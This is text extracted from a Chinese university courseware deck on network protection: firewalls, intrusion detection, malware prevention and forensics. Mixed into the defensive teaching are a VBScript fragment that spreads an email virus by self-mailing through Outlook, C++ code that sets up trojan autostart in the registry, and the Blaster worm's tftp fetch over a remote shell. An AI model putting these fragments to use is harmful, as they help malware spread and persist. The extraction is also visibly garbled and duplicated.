第6章-网络安全防护技术-《网络安全技术(第2版)》课件

资源描述

112 七月 2024网络安全技术网络安全技术（第（第2 2版）版）网络安全技术（第2版）刘化君刘化君等编著等编著教学课件212 七月 2024网络安全技术网络安全技术（第（第2 2版）版）第6章网络安全防护技术网络安全防护技术是指为防止网络通信阻塞、中网络安全防护技术是指为防止网络通信阻塞、中断、瘫痪或被非法控制等以及网络中传输、存储、处断、瘫痪或被非法控制等以及网络中传输、存储、处理的数据信息丢失、泄露或被非法篡改等所需要的相理的数据信息丢失、泄露或被非法篡改等所需要的相关技术关技术。本章讨论一些针对性较强的网络安全防护技术，如防火墙、入侵检测及恶意代码防范与响应等。虽然这些技术对防御具体的入侵机制很有效，但攻击者也肯定不会总遵循固定的规则实施攻击，因此需要更具有普遍性的解决方案，进而引入了对入侵检测系统、网络攻击取证与安全审计等方面的讨论。刘化君等编著312 七月 2024网络安全技术网络安全技术（第（第2 2版）版）36.1 防火墙技术防火墙技术6.2 入侵检测系统入侵检测系统6.3 恶意代码防范与应急响应恶意代码防范与应急响应6.4 网络攻击取证与安全审计网络攻击取证与安全审计第6章网络攻击原理及技术刘化君等编著412 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术防火墙技术防火墙的本义原是指古代人们房屋之间修建的墙，这道墙可以防止火灾发生的时候蔓延到别的房屋。第6章网络安全防护技术网络安全防护技术512 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.1防火墙概述防火墙是一种综合性较强的网络防护工具，涉及到计算机网络技术、密码技术、软件技术、安全协议、安全标准、安全操作系统等多方个面。它通常是一种软件和硬件的组合体，用于网络间的访问控制。6.1 防火墙技术防火墙技术防火墙（Firewall）是目前最为流行也是广泛使用的一种执行访问控制策略的一个或一组安全系统。在构建安全网络的过程中，防火墙作为内网与外网之间的第一道安全防线，是非常重要的网络安全技术之一。第6章网络安全防护技术网络安全防护技术612 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.1防火墙概述1.防火墙的基本概念所谓防火墙是指设置在不同网络或网络安全域之间的所谓防火墙是指设置在不同网络或网络安全域之间的一系列部件的组合一系列部件的组合。它是不同网络或网络安全域之间信息的唯一出入口，能根据部门的安全策略控制（允许、拒绝、监测）出入网络的数据流，且本身具有较强的抗攻击能力。在物理组成物理组成上，防火墙系统可以是路由器，也可以是个人计算机、主机系统，或一批向网络提供安全保障的软硬件系统。在逻辑逻辑上，防火墙是一个分离器、一个限制器，也可以是一个分析器。6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术712 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.1防火墙概述1.防火墙的基本概念防火墙逻辑示意图6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术812 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.1防火墙概述2防火墙的主要功能1）通过防火墙可以定义一个阻塞点(控制点)，过滤进、出网络的数据，管理进、出网络的访问行为。(过滤过滤)2）控制对特殊站点的访问，例如可以配置相应的WWW和FTP服务，使互联网用户仅可以访问此类服务，而禁止对其它系统的访问。（访问控制）（访问控制）3）记录内外通信的有关状态信息日志，监控网络安全并在异常情况下给出告警。（监控）（监控）4）可提供NAT，如可以用来实现虚拟专用网（VPN）。（VPN）6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术912 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.1防火墙概述3.防火墙的实现原则防火墙是一个矛盾统一体，它既要限制数据的流通，又要保持数据的流通。两项基本原则：1）一切未被允许的都是禁止的。根据这一原则，防火墙应封锁所有数据流，然后对希望提供的服务逐项开放。2）一切未被禁止的都是允许的。根据这一原则，防火墙应转发所有数据流，然后逐项屏蔽可能有害的服务。实际中，很多防火墙系统在两者之间做一定的折衷。6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术1012 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.1防火墙概述4.防火墙的主要类型（1）包过滤防火墙（2）应用代理防火墙（3）电路层防火墙（4）状态检测防火墙6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术1112 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.2 防火墙技术原理防火墙技术经历了包过滤、应用代理、状态检测及深度检测技术等发展阶段，目前，已有多种防火墙技术可供网络安全管理员选择使用。6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术1212 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.2 防火墙技术原理1.包过滤技术：包过滤(Packet Filtering)就是在网络层，依据系统事先设定的过滤规则，检查数据流中的每个包，根据包头信息来确定是否允许数据包通过。包过滤工作原理6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术1312 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.2 防火墙技术原理包过滤工作示意图6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术1412 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.2 防火墙技术原理n一个可靠的分组过滤防火墙依赖于规则集，例如：n第一条规则：主机10.1.1.1任何端口访问任何主机的任何端口，基于TCP协议的数据包都允许通过。n第二条规则：任何主机的20端口访问主机10.1.1.1小于1024的端口，如果基于TCP协议的数据包都禁止通过。组序号动作源IP目的IP源端口目的端口协议类型1允许10.1.1.1*TCP2禁止*10.1.1.1201024TCP6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术1512 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1.2 防火墙技术原理2.代理服务器技术所谓代理服务器是指代表内网向外网服务器进行连接请求的服务程序，其基本工作原理见下图：6.1 防火墙技术防火墙技术第6章网络安全防护技术网络安全防护技术1612 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术6.1.2 防火墙技术原理2.代理服务器技术代理防火墙的工作原理所谓代理服务器是指代表内网向外网服务器进行连接请求的服务程序。转发响应第6章网络安全防护技术网络安全防护技术1712 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术6.1.2 防火墙技术原理3.状态检测技术即动态包过滤技术动态包过滤技术。在防火墙的核心部分建立状态连接表，并将进出网络的数据包当成一个一个的会话，利用状态连接表跟踪每一个会话状态。状态检测防火墙不仅根据规则表对每一个数据包进行检查，而不仅根据规则表对每一个数据包进行检查，而且还考虑数据包是否符合会话所处的状态，通过对高层的信息进行且还考虑数据包是否符合会话所处的状态，通过对高层的信息进行某种形式的逻辑或数学运算，提供对传输层的控制。某种形式的逻辑或数学运算，提供对传输层的控制。第6章网络安全防护技术网络安全防护技术1812 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术6.1.2 防火墙技术原理3.状态检测技术如表6-3所列，每个当前建立的连接都记录在状态连接表里，如果一个数据包的源端口是系统内部的一个介于1024和16383之间的端口，而且它的信息与状态连接表里的某一条记录相符，包过滤器才允许它进入。源地址源端口目的地址目的端口连接状态192.168.19.1011030216.199.88.2980已建立192.168.19.1021031210.32.188.12380已建立192.168.19.1061033192.168.1.625已建立210.199.216.193356192.168.1.679已建立223.256.18.231025192.168.1.680已建立表6-3 状态检测防火墙的状态连接表示例第6章网络安全防护技术网络安全防护技术1912 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术状态检测防火墙的工作示意图第6章网络安全防护技术网络安全防护技术2012 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术6.1.3 防火墙的体系结构目前，防火墙的体系结构有双重宿主主机体系结构、屏蔽主机体系结构、屏蔽子网体系结构，以及新型混合防火墙体系结构等类型。1.双重宿主主机体系结构第6章网络安全防护技术网络安全防护技术2112 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术6.1.3 防火墙的体系结构2.屏蔽主机体系结构图6-8 屏蔽主机防火墙体系结构第6章网络安全防护技术网络安全防护技术2212 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术6.1.3 防火墙的体系结构3.屏蔽子网体系结构图6-9 屏蔽子网防火墙体系结构DMZ第6章网络安全防护技术网络安全防护技术2312 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术6.1.4 防火墙的部署应用实例1区域分割的层叠方式图6-10 防火墙系统的层叠方式第6章网络安全防护技术网络安全防护技术2412 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.1 防火墙技术6.1.4 防火墙的部署应用实例2.区域分割的三角方式图6-11 以区域分割的三角方式部署防火墙第6章网络安全防护技术网络安全防护技术2512 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.1 何谓入侵检测系统入侵检测（Intrusion Detection），顾名思义便是对入侵行为的发觉,即在计算机网络系统中的若干关键点搜集信息，通过对所收集信息的分析发现网络系统中是否有违反安全策略的行为和遭到攻击的迹象。入侵检测的目的主要是：识别入侵者；识别入侵行为；检测和监视已实施的入侵行为；为对抗入侵提供信息，阻止入侵的发生和事态的扩大。进行入侵检测的软件、硬件组合便是入侵检测系统。第6章网络安全防护技术网络安全防护技术2612 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2.1 何谓入侵检测系统1入侵检测系统的原理及基本结构6.2 入侵检测系统入侵检测系统原理第6章网络安全防护技术网络安全防护技术2712 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.1 何谓入侵检测系统1入侵检测系统的原理及基本结构入侵检测系统的基本结构第6章网络安全防护技术网络安全防护技术2812 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.1 何谓入侵检测系统2.入侵检测系统的主要功能一般说来，IDS应具有的功能为：监控、分析用户和系统的活动；核查系统配置和漏洞；评估关键系统和数据文件的完整性；对异常行为统计分析，识别攻击的活动模式并报警；对操作系统进行审计、跟踪管理。第6章网络安全防护技术网络安全防护技术2912 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.1 何谓入侵检测系统3.入侵检测的过程(1)信息收集收集的内容包括系统、网络、数据及用户活动的状态和行为。（2)数据分析核心工作。按照数据分析的方式，一般有三种手段：模式匹配。统计分析。完整性分析。（3)结果处理通过数据分析发现了入侵迹象时，入侵检测系统把分析结果记录在日志文件中，并产生一个告警报告，同时还要触发警报到控制台。第6章网络安全防护技术网络安全防护技术3012 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.1 何谓入侵检测系统4入侵检测系统的分类（1）按照入侵检测的体系结构划分基于主机的入侵检测系统、基于网络的入侵检测系统和分布式入侵检测系统。（2）按照入侵检测的时间分类实时入侵检测系统和事后入侵检测系统两种类型。第6章网络安全防护技术网络安全防护技术3112 七月 2024网络安全技术网络安全技术（第（第2 2版）版）316.2 入侵检测系统4入侵检测系统的分类第6章网络安全防护技术网络安全防护技术3212 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.2 入侵检测系统的分析技术1.异常入侵检测技术（1）基于统计学方法的异常分析（2）基于计算机免疫技术的异常检测方法（3）基于数据挖掘的异常检测方法2.特征分析检测技术（1）模式匹配（2）专家系统第6章网络安全防护技术网络安全防护技术3312 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.3 入侵检测系统的设置与部署1.网络入侵检测系统的设置步骤第6章网络安全防护技术网络安全防护技术3412 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.3 入侵检测系统的设置与部署2.入侵检测系统部署（1）基于网络入侵检测系统的部署一般说来，可以将入侵检测系统的部署点划分为外网入口、DMZ区、内网主干和关键子网4个部署点，如图。第6章网络安全防护技术网络安全防护技术3512 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.3 入侵检测系统的设置与部署2.入侵检测系统部署（1）基于主机入侵检测系统的部署安装在被重点监测的关键主机上。第6章网络安全防护技术网络安全防护技术3612 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.2 入侵检测系统6.2.4 典型入侵检测系统应用案例 Snort Snort 是一个开放源代码的免费软件，它基于libpcap 的数据包嗅探器，并可以作为一个轻量级的网络入侵检测系统（NIDS）。通过在中小型网络上部署Snort系统，可以在分析捕获的数据包基础上，进行入侵行为特征匹配工作，或从网络活动的角度检测异常行为，并完成入侵的预警或记录。第6章网络安全防护技术网络安全防护技术3712 七月 2024网络安全技术网络安全技术（第（第2 2版）版）Snort的工作流程示意图第6章网络安全防护技术网络安全防护技术3812 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.1 何谓恶意代码与应急响应何谓恶意代码？它们从哪里来？是如何传播的？应该如何防止？如果已经被恶意代码侵害，又应该如何处理？1.恶意代码的含义所谓恶意代码实质上是指一种在一定环境下可以独立执行的计算机程序或者嵌入到其它程序中的代码，也称之为恶意软件。恶意代码能在不被用户察觉的情况下启动运行，破坏计算机系统的安全性和完整性。第6章网络安全防护技术网络安全防护技术3912 七月 2024网络安全技术网络安全技术（第（第2 2版）版）396.3 恶意代码防范与应急响应6.3.1 何谓恶意代码与应急响应1.恶意代码的含义（1）恶意代码的分类第6章网络安全防护技术网络安全防护技术4012 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.1 何谓恶意代码与应急响应1.恶意代码的含义（1）恶意代码的分类第6章网络安全防护技术网络安全防护技术4112 七月 2024网络安全技术网络安全技术（第（第2 2版）版）u主动放置u网页u电子邮件u漏洞u移动存储u共享u即时通信u软件捆绑6.3.1 何谓恶意代码与应急响应1.恶意代码的含义（2）恶意代码的传播第6章网络安全防护技术网络安全防护技术4212 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.1 何谓恶意代码与应急响应2.什么是应急响应所谓应急响应通常指一个组织为了应对各种突发事件的发生所做的准备，以及在突发事件发生后所采取的措施和行动。第6章网络安全防护技术网络安全防护技术4312 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应网络攻击应急响应技术网络攻击应急响应技术是一门综合性技术，几乎与网络安全领域内的所有技术有关。它涉及到入侵检测、事件隔离与快速恢复、网络追踪和定位，以及网络攻击取证技术等方方面面。通常，网络攻击应急响应的重点应该放在恶意代码防范与应急响应技术上，其目标是掌握有效的恶意代码防范与反击策略。比如，面对冲击波只有靠打补丁，如果用户没有打补丁，病毒就会通过网络不断传播，这时就应把这个端口封锁住。第6章网络安全防护技术网络安全防护技术4412 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范1.网络病毒的概念（1）计算机病毒的定义从广义上讲，凡能够引起计算机系统故障，破坏计算机数据的程序统称为计算机病毒。简言之，计算机病毒就是一种恶意代码，即可感染的依附性恶意代码。它隐藏在计算机系统资源中，能影响系统正常运行，并通过系统资源共享等途径进行传播。计算机病毒一般由三部分组成：主控程序负责病毒程序的组装和初始化工作；传染程序将病毒程序传染到其它的可执行程序上去；破坏程序实现病毒程序编制者的破坏意图。第6章网络安全防护技术网络安全防护技术4512 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范1.网络病毒的概念（2）网络病毒的含义若按病毒传播方式划分，可以将其分为单机病毒和网络病毒两类。所谓网络病毒是指，通过网络通信机制，引起计算机系统、网络系统故障，破坏网络通信及数据的恶意代码。第6章网络安全防护技术网络安全防护技术4612 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范2.计算机病毒的结构及工作机制（1）计算机病毒的结构计算机病毒的基本特征是引导、触发、传染和破坏，因此一个计算机病毒一般由引导模块、触发模块、传染模块和破坏模块组成。计算机病毒工作机制示意图第6章网络安全防护技术网络安全防护技术4712 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范3.典型邮件病毒代码分析通过Outlook传播的病毒基本上用VBScript语言编写而成，其自我复制原理也是利用程序本身的脚本内容复制一份到一个临时文件，然后再在传播环节将其作为附件发送出去。例如，使用如下两行代码就可以将自身复制到C盘根目录下的temp.vbs文件中。Set fso=CreateObject(“Scripting.FileSystemObject”)Fso.GetFile(WScript.ScriptFullName).Copy(“C:temp.vbs”)其中，第一行创建一个文件系统对象。第二行前面是打开这个脚本文件，WScript.ScriptFullName用于指明是这个程序本身，即一个完整的路径文件名；用GetFile函数获得这个文件；使用Copy函数将这个文件复制到C盘根目录下的temp.vbs文件中。第6章网络安全防护技术网络安全防护技术4812 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范3.典型邮件病毒代码分析如下的代码段可实现邮件病毒的传播：Set ola=CreateObject(“Outlook.Application”)On Error Resume Nextfor i=1 to 60Set Mail=ola.CreateItem(0)Mail.to=ola.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(x)Mail.Subject=“Betreffder E-Mail”Mail.Body=“Textder E-Mail”Mail.Attachments.Add(“C:temp.vbs”)Mail.SendOla.Quit第6章网络安全防护技术网络安全防护技术4912 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.3 网络蠕虫1.蠕虫病毒蠕虫(Worm)，从广义上来讲一般认为是一种通过网络传播的恶性病毒，但蠕虫病毒与一般病毒有很大区别，蠕虫是一种通过网络传播的恶性病毒，具有病毒的一些共性，如传播性、隐蔽性、破坏性等；同时又有自己的一些特征，如不利用文件寄生同时又有自己的一些特征，如不利用文件寄生(只存在于内存中只存在于内存中)，对网，对网络造成拒绝服务等。络造成拒绝服务等。第6章网络安全防护技术网络安全防护技术5012 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.3 网络蠕虫1.蠕虫病毒蠕虫的工作过程一般为：扫描：蠕虫开始随机选取某一段IP地址，然后对这一IP地址段上的主机进行扫描，探测存在漏洞的主机。有时可能会不断重复这一扫描过程。这样，随着蠕虫的传播，新感染的主机也开始进行这种扫描。网络上的扫描包就越多。攻击：当蠕虫扫描到网络中存在漏洞的主机后，就开始利用自身的破坏功能获取主机的管理员权限。利用原主机与新主机的交互，将蠕虫程序复制到新主机并启动。第6章网络安全防护技术网络安全防护技术5112 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.3 网络蠕虫2.蠕虫程序的功能结构和传播流程蠕虫程序的功能结构模型第6章网络安全防护技术网络安全防护技术5212 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.3 网络蠕虫2.蠕虫程序的功能结构和传播流程蠕虫程序传播流程第6章网络安全防护技术网络安全防护技术5312 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.3 网络蠕虫3.典型蠕虫病毒实例分析冲击波蠕虫病毒执行流程如下:1)病毒运行时首先在内存中建立一个名为:“msblast.exe”的进程，该进程就是活的病毒体。病毒还会修改注册表，在“HKEY_LOCAL_MACH INESOFTWAREMicrosoftWindowsCurrentVersion Run”中添加键值:“windows autoupdate=msblast.exe”，这样在每次启动系统时，病毒就会自动运行。2)判断BILLY互斥体，如果已经感染，蠕虫退出。3)以20秒为间隔，检测一次网络连接状态。若未连入网络，永远循环。4)判断日期大于15号、月份大于8，蠕虫启动syn flood攻击某网站更新站点，例如的Web服务端口80。5)首先感染子网IP地址，然后随机感染外网IP地址。6)感染其它主机，若缓冲区溢出成功，远程主机会在4444端口监听，提供cmd shell服务；然后本地开启tftp(69端口)服务，接着利用连接4444端口socket发送命令tftp-i ip GET msblast.exe，最后执行get后的程序。第6章网络安全防护技术网络安全防护技术5412 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.3 网络蠕虫4.网络蠕虫的防范措施(1)修补系统漏洞(2)删除蠕虫要利用的程序(3)配置合适的网络防火墙(4)采用入侵检测技术(5)接种疫苗第6章网络安全防护技术网络安全防护技术5512 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.3 网络蠕虫5.网络蠕虫的清除方法(1)用杀毒软件查杀(2)手工清除先拨掉网线，启动任务管理器，在其中查找msblast.exe进程，找到后在进程上单击右键，选择结束进程。用文件搜索的方法查找到Msblast.exe后删除。修改注册表，点开始菜单中的运行，输入regedit后点确定运行注册表编辑器，找到“HKEY_LOCAL_MACH INESoftwareMicrosoftWindowsCurrentVersionRun”后，在右边找到键值“windows autoupdate=msblast.exe”，将其删除。重启计算机并打上补丁，以免计算机再次遭受蠕虫攻击。连接网线，恢复正常工作。第6章网络安全防护技术网络安全防护技术5612 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.4 特洛伊木马1.木马的含义简单地讲，木马是一种带有恶意性质的远程控制软件。一般的木马包括一个服务器程序和一个客户机程序。服务器程序负责打开攻击的通道，放置在被入侵的计算机中，就像一个内奸特务。通常所说的木马程序即是服务器程序。客户机程序放在木马控制者的计算机中，负责攻击目标主机。第6章网络安全防护技术网络安全防护技术5712 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.4 特洛伊木马2.木马系统的关键技术（1）远程启动技术1）注册表启动。2）Windows系统服务。3）系统配置文件。4）修改文件关联。（2）自动隐藏技术1）进程插入。2）核心态隐藏。3）隐蔽通信技术。4）反弹式木马技术。（3）自动加载技术（4）输入设备控制（5）远程文件管理第6章网络安全防护技术网络安全防护技术5812 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.4 特洛伊木马3木马自动加载程序代码示例 HKEY hKey;/*创建注册表键项*/if(!RegCreateKey(HKEY_LOCAL_MACHINE，SOFTWAREMicrosoftWindowsCurrentVersionRun，&hKey)CString strKey;char cSysPathMAX_PATH;:GetSystemDirectory(cSysPath，MAX_PATH);/获得当前系统目录 /*设置自启动的程序名称*/strKey =cSysPath;strKey +=TrojanAutoRun.exe;/*设置注册表键值为自启动程序名称*/RegSetValueEx(hKey，/所要设置的键的句柄TrojanAutoRun，/所要访问的键值的名称 0，REG_SZ，/所要设置的数据类型(LPBYTE)strKey.GetBuffer(0),/所要设置的键值 strKey.GetLength()/数据的长度 );第6章网络安全防护技术网络安全防护技术5912 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.4 特洛伊木马4.木马病毒的检测（1）检查网络通信流量（2）查看进程与网络连接（3）检查启动项（4）检查系统账户（5）查看进程加载的服务（6）使用病毒检测软件查杀木马第6章网络安全防护技术网络安全防护技术6012 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.5 网页恶意代码网页恶意代码又称为网页病毒，主要指某些网站使用的恶意代码。某些网站使用的恶意代码。它用脚本语言来实现相关功能，利用软件和操作系统安全漏洞通过网它用脚本语言来实现相关功能，利用软件和操作系统安全漏洞通过网页进行传播。页进行传播。网页恶意代码依赖于脚本引擎解释执行。1.网页恶意代码的特点及安全威胁网页恶意代码的常见危害形式有：1）更改主页设置；2）隐藏“开始”菜单的命令；3）隐藏“我的电脑”中的硬盘；3）隐藏桌面图标；4）禁用DOS程序；5）修改登录窗口；6）修改IE浏览器的标题，即修改浏览器最上方的蓝色标题栏中的文字，在上面加入广告或宣传文字。第6章网络安全防护技术网络安全防护技术6112 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.5 网页恶意代码2.网页恶意代码的类型 1）基于JavaScript的脚本病毒。2）基于VBScript的脚本病毒。3）基于PHP的脚本病毒。4）脚本语言与木马结合的病毒。第6章网络安全防护技术网络安全防护技术6212 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.3 恶意代码防范与应急响应6.3.5 网页恶意代码4.网页恶意代码的防范与清除1）不要轻易浏览一些来历不明的网站，特别是有不良内容的网站。2）如果系统己经遭到网页恶意代码的攻击，可采用手工修改注册表相关键值的方法恢复系统。3）修改修改Windows IE浏览器中浏览器中Internet选项选项的安全级别，把安全级别由的安全级别，把安全级别由“中中”改为改为“高高”。4）鉴于某些恶意代码调用ActiveXComponent类，可以对“C:WindowsJavaPackages”文件夹中含有ActiveXComponent.class类的ZIP文件重命名，还可以直接把Java文件夹重命名。5）如果己经知道某些网站具有恶意代码，可以在IE的Internet选项中启用分级审查，在许可站点标签中输入不想访问的网址，以便永不进入这些具有恶意代码的网站。第6章网络安全防护技术网络安全防护技术6312 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.4 网络攻击取证与安全审计6.4.1 计算机取证技术1.数字证据的概念（1）数字证据的定义数字证据也称为计算机证据。计算机证据国际组织给出的与数字证据相关的定义为：1）数字证据数字证据：法庭上可能成为证据的以二进制形式存储或传送的信息。2）原始数字证据原始数字证据：查封计算机犯罪现场时，相关物理介质及其存储的数据对象。3）数字证据副本数字证据副本：原始物理介质上获取的所有数据对象的精确拷贝。4）拷贝拷贝：拷贝是指独立于物理介质，精确地再现数据对象中的信息。第6章网络安全防护技术网络安全防护技术6412 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.4 网络攻击取证与安全审计6.4.1 计算机取证技术2.计算机取证的定义计算机取证（Computer Forensic）在网络安全领域属于主动防御技术，也称之为网络取证、数字取证、电子取证。比如一台计算机遭到黑客攻击，瘫痪了，硬盘数据被删，计算机取证就是利用特殊的分析软件，通过对磁盘的分析恢复数据记录。这项技术目前做得最好的是美国，可以非常精确地定位遭遇攻击的时间、地点和来源，甚至可以准确地判断是个人攻击行为还是团队攻击。计算机取证，即收集电子证据，是指对计算机入侵、破坏、欺诈、计算机取证，即收集电子证据，是指对计算机入侵、破坏、欺诈、攻击等犯罪行为，利用计算机软硬件技术，按照符合法律规范的方法攻击等犯罪行为，利用计算机软硬件技术，按照符合法律规范的方法进行识别、保存、分析和提交数字证据的过程。进行识别、保存、分析和提交数字证据的过程。第6章网络安全防护技术网络安全防护技术6512 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.4 网络攻击取证与安全审计6.4.1 计算机取证技术3.计算机取证的原则1)取证过程合法性。2)及时性。3)多备份。4)环境安全性。5)严格管理。第6章网络安全防护技术网络安全防护技术6612 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.4 网络攻击取证与安全审计6.4.1 计算机取证技术4.计算机取证的步骤1）保护现场和现场勘查。2）获取证据。3）鉴定、保存证据。4）证据分析。5）提交证据。第6章网络安全防护技术网络安全防护技术6712 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.4 网络攻击取证与安全审计6.4.1 计算机取证技术5.计算机取证的方法1）静态取证方法静态取证方法。静态取证方法是在案发之后或已经造成严重后果之后，对计算机硬件的原始数据进行保全、检查、分析，然后从中找出与案件有关的数字证据。静态取证缺乏实时性和连续性，证明力较弱。2）动态取证方法动态取证方法。动态取证方法是指对处于开机或联网状态下的计算机及其相关计算机设备（包括交换机、路由器等）的内存数据、网络运行数据、系统运行状况等进行相关的实时监控、分析和保存，从中发现相关的犯罪证据。最具特色的有：入侵检测取证技术、网络追踪技术、信息搜索与过滤技术、蜜罐/蜜网取证技术等。第6章网络安全防护技术网络安全防护技术6812 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.4 网络攻击取证与安全审计6.4.2 网络安全审计所谓网络安全审计，是指根据一定的安全策略记录，通过分析历根据一定的安全策略记录，通过分析历史操作事件及数据，对一个特定网络安全的脆弱性进行测试、评估、史操作事件及数据，对一个特定网络安全的脆弱性进行测试、评估、分析的过程分析的过程。1.安全审计系统的主要作用对潜在的攻击者起到震慑或警告作用；对已经发生的系统破坏行为提供有效的追究证据；提供有价值的系统使用日志，帮助系统管理员及时发现系统入侵行为或潜在的系统漏洞；提供系统运行的统计日志，帮助系统管理员发现系统性能上的脆弱点或需要改进与加强的地方。第6章网络安全防护技术网络安全防护技术6912 七月 2024网络安全技术网络安全技术（第（第2 2版）版）6.4 网络攻击取证与安全审计6.4.2 网络安全审计2.网络安全审计的主要内容（1）网络设备审计1）网络设备2）网络数据3）网络带宽4）接入用户数量5）任意时刻通过网络的信息是否安全；网络身份鉴别是否有效等。（2）日志文件审计（3）安全威胁审计分析第6章网络安全防护技术网络安全防护技术7012 七月 2024网络安全技术网络安全技术（第（第2 2版）版）思考与练习1.访问控制主要包括哪些要素？2.简述自主访问控制的工作原理。3.强制访问控制安全模型规定了哪些内容？为什么强制访问控制能够限制特洛伊木马？4.基于角色的访问控制是如何实现的，与DAC、UAC相比较具有哪些优点？5.为什么说访问控制矩阵是访问控制模型的一种实现方式，并进行简要分析。6简述防火墙的基本功能。防火墙为何不能防御内部网络攻击？7试述常见防火墙的体系结构，比较它们的优缺点。8编写防火墙规则：禁止管理员计算机（IP地址为202.119.167.6）外任何一台计算机访问某主机（IP地址为202.119.167.11）的终端服务（TCP端口为3689）。9简述配置防火墙的基本步骤及其应该注意的事项，试配置某一典型防火墙。10什么是入侵检测、入侵检测系统？它与其它网络安全技术有什么不同？第6章网络安全防护技术网络安全防护技术7112 七月 2024网络安全技术网络安全技术（第（第2 2版）版）Thank you！欢迎使用欢迎使用网络安全技术网络安全技术刘化君等编著

展开阅读全文

第6章-网络安全防护技术-《网络安全技术(第2版)》课件

最新文档